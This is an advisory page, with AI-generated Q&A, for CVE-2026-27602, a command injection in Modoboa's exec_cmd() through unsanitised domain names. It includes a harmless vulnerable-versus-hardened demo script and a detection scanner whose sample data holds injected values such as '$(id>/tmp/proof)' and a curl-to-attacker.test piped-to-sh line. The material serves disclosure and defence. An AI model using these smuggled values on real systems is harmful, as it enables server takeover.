CVE-2026-27602
Status: Received - Intake
Command Injection in Modoboa exec_cmd() via Unsanitized Domain Names

Publication date: 2026-03-25

Last updated on: 2026-03-26

Assigner: GitHub, Inc.

Description
Modoboa is a mail hosting and management platform. Prior to version 2.7.1, `exec_cmd()` in `modoboa/lib/sysutils.py` always runs subprocess calls with `shell=True`. Since domain names flow directly into shell command strings without any sanitization, a Reseller or SuperAdmin can include shell metacharacters in a domain name to run arbitrary OS commands on the server. Version 2.7.1 patches the issue.
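The following is an added illustration of the CWE-78 shape the description names, not Modoboa's code: a helper that hands one interpolated string to the shell (`shell=True`) beside a hardened helper that validates the domain name against a strict hostname pattern and passes an argument list with `shell=False`. The wrapped command (`echo`), the function bodies and the hostname pattern are assumptions chosen so the demo runs harmlessly; the injected "domain" is a constructed input using `echo INJECTED` in place of a destructive payload.

```python
"""Added illustration of CWE-78 as described for CVE-2026-27602.

NOT Modoboa's code. Contrasts a shell=True helper that interpolates a
domain name into a command string with a hardened helper that validates
the name and passes an argument list with shell=False.  The wrapped
command (echo), the function bodies and the hostname regex are assumptions.
"""
import re
import subprocess

# Constructed test input: a "domain" carrying a command separator.  A harmless
# echo stands in for a real payload such as $(id>/tmp/proof).
INJECTED_DOMAIN = "example.com;echo INJECTED"


def exec_cmd_vulnerable(cmd):
    """'Before' shape: one string handed to /bin/sh, so ';', '|', '$(...)'
    and friends inside it are interpreted by the shell."""
    proc = subprocess.run(cmd, shell=True, capture_output=True)
    return proc.returncode, proc.stdout


def run_vulnerable(domain):
    # The domain is interpolated straight into the command string.
    return exec_cmd_vulnerable("echo checking %s" % domain)


# Allowlist for hostnames (ASCII labels; IDNs must be punycoded first).
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"                                   # total length
    r"(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+"      # one or more labels
    r"[a-z]{2,63}$",                                    # alphabetic TLD
    re.IGNORECASE,
)


def validate_domain(domain):
    """Reject anything that is not a syntactically valid hostname; that also
    excludes every shell metacharacter, whitespace and a leading '-'."""
    if not _HOSTNAME_RE.match(domain):
        raise ValueError("invalid domain name: %r" % (domain,))
    return domain


def exec_cmd_hardened(argv):
    """'After' shape: argv list, shell=False.  Each element reaches the
    program as exactly one argument; nothing is parsed by a shell."""
    if isinstance(argv, str):
        raise TypeError("pass an argument list, not a command string")
    proc = subprocess.run(argv, shell=False, capture_output=True)
    return proc.returncode, proc.stdout


def run_hardened(domain):
    # Two independent layers: validate the value, and never build a string.
    return exec_cmd_hardened(["echo", "checking", validate_domain(domain)])


def run_argv_only(domain):
    # No validation but still shell=False: the metacharacters are passed
    # through literally, so nothing extra executes.
    return exec_cmd_hardened(["echo", "checking", domain])


if __name__ == "__main__":
    print(run_vulnerable(INJECTED_DOMAIN)[1])   # two lines: the echo, then INJECTED
    print(run_argv_only(INJECTED_DOMAIN)[1])    # one line, payload printed literally
    try:
        run_hardened(INJECTED_DOMAIN)
    except ValueError as exc:
        print("rejected:", exc)
```

The argv form alone already stops the injection, because nothing re-parses the string; the hostname allowlist is the second layer, and it also rejects names that begin with `-`, which an argv-based call would otherwise hand to the program as an option.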
Meta Information
Published: 2026-03-25
Last Modified: 2026-03-26
Generated: 2026-05-07
AI Q&A: 2026-03-25
EPSS Evaluated: 2026-05-05
Affected Vendors & Products
1 associated CPE
Vendor: modoboa
Product: modoboa
Version range: all versions before 2.7.1 (2.7.1 excluded)
CWE
CWE-78: The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
AI Powered Q&A
Can you explain this vulnerability to me?

Modoboa is a mail hosting and management platform. Before version 2.7.1, the helper `exec_cmd()` in `modoboa/lib/sysutils.py` always ran subprocess calls with `shell=True`, so each command string was parsed by the system shell instead of being passed to a program as an argument list. Domain names were interpolated into those command strings without any sanitization. A Reseller or SuperAdmin, the roles that manage domains, can therefore put shell metacharacters such as `;`, `|` or `$(...)` into a domain name and have the shell execute arbitrary operating system commands on the server (CWE-78).


How can this vulnerability impact me?

This is a post-authentication issue, but a serious one. Reseller and SuperAdmin are application-level roles, yet the injected commands run with the operating-system privileges of the account the Modoboa process runs as, outside any per-tenant boundary the application enforces. A malicious Reseller, or anyone holding a phished or stolen Reseller or SuperAdmin credential, can fully compromise the mail host: read or alter mail and account data, disrupt service, or pivot further into the infrastructure.


What immediate steps should I take to mitigate this vulnerability?

Upgrade Modoboa to version 2.7.1 or later, where the issue is patched. Until the upgrade is in place, keep the set of Reseller and SuperAdmin accounts as small as possible. After upgrading, audit the domain names already stored, because a malicious name may have been created before the patch and the upgrade does not by itself tell you whether the flaw was exploited.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

Detection has two parts: confirm whether the installed Modoboa is a vulnerable version (anything before 2.7.1), and look for evidence of exploitation, which here means a domain name (or, as a precaution, any other administrator-supplied name) containing shell metacharacters.

Exploitation leaves behind whatever the injected command did. A proof-of-concept of the shape `$(id>/tmp/proof)` embedded in a domain name would leave a file /tmp/proof owned by the account the Modoboa process runs as; a real attacker is more likely to fetch a script, add credentials or open a reverse shell, so look for those artefacts as well.

Suggested checks for potential exploitation or suspicious activity:

  • Query the Modoboa database for domain names (and other administrator-supplied names) containing shell metacharacters such as `$`, `` ` ``, `;`, `|`, `&`, `(`, `)`, `<`, `>` or whitespace. A valid hostname contains none of these, so matching every name against a strict hostname pattern is simpler and more complete than enumerating characters.
  • Search for unexpected files created by injected commands, for example `ls -l /tmp/proof`, and more generally for recent files in /tmp and other world-writable directories owned by the Modoboa service account, e.g. `find /tmp -user <modoboa service user> -mtime -30 -ls`.
  • Review Modoboa and web-server logs for domain creation or edit requests whose names contain metacharacters, and for errors related to subprocess calls.
  • Inspect the process tree for shells, downloaders or network tools running under the Modoboa service account, e.g. `ps -eo pid,ppid,user,cmd` filtered on that user; grepping for "modoboa" in command lines alone will miss a child process named `sh` or `curl`.

The vendor resources provide no dedicated detection signatures; scanning stored domain names against a strict hostname pattern and checking for unexpected files or child processes are the practical approaches.
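As an added example of the two checks above (not part of the original page or of Modoboa), the script below compares a version string against the fixed release and scans domain names for shell metacharacters or, more strictly, for anything that is not a syntactically valid hostname. The rows are constructed sample data standing in for a `SELECT` of domain names from the Modoboa database; the one-column row layout and the hostname pattern are assumptions.

```python
"""Added detection helpers for CVE-2026-27602 (not Modoboa's code).

Two checks: is the installed version below 2.7.1, and do stored domain
names contain anything a shell would interpret.  SAMPLE_ROWS is constructed
sample data standing in for rows fetched from the domain table; the
single-column layout is an assumption.
"""
import re

FIXED_VERSION = (2, 7, 1)

# Characters /bin/sh treats specially; any hit means manual inspection.
# '-' is deliberately absent here; the hostname check below covers it.
_SHELL_META = re.compile("[" + re.escape(";&|`$()<>{}\\\"'*?[]!~#") + r"\s]")

# Same allowlist idea as a proper fix: a syntactically valid hostname cannot
# carry a metacharacter, whitespace or a leading '-' (option injection).
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$",
    re.IGNORECASE,
)

# Constructed sample rows: (domain_name,) tuples as a DB cursor would yield.
SAMPLE_ROWS = [
    ("example.com",),
    ("mail.example.org",),
    ("xn--bcher-kva.example",),                         # punycoded IDN, legitimate
    ("evil.example;curl http://attacker.test/x|sh",),   # separator plus pipe
    ("x.example$(id>/tmp/proof)",),                     # advisory-style payload
    ("-n.example",),                                    # no metacharacter, option-like
]


def parse_version(text):
    """'2.7.0' -> (2, 7, 0); 'v2.7' -> (2, 7, 0).  Pre-release suffixes
    such as 'rc1' are ignored."""
    parts = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def is_vulnerable_version(text):
    return parse_version(text) < FIXED_VERSION


def classify(name):
    """Return None for a clean name, otherwise a short reason string."""
    if _SHELL_META.search(name):
        return "shell metacharacter"
    if not _HOSTNAME_RE.match(name):
        return "not a valid hostname"
    return None


def find_suspicious_names(rows):
    """Scan cursor-style rows; returns [(name, reason), ...] in row order."""
    flagged = []
    for (name,) in rows:
        reason = classify(name)
        if reason:
            flagged.append((name, reason))
    return flagged


if __name__ == "__main__":
    print("2.7.0 vulnerable:", is_vulnerable_version("2.7.0"))
    for name, reason in find_suspicious_names(SAMPLE_ROWS):
        print("%-45s %s" % (name, reason))
```

The blocklist catches the payloads the advisory describes; the hostname allowlist additionally flags names like `-n.example`, which contain no metacharacter but would be read as an option by the program receiving them. Run the scan over the real domain table by replacing `SAMPLE_ROWS` with the cursor's result set.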


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

The provided context and resources do not include any information regarding the impact of CVE-2026-27602 on compliance with common standards and regulations such as GDPR or HIPAA.

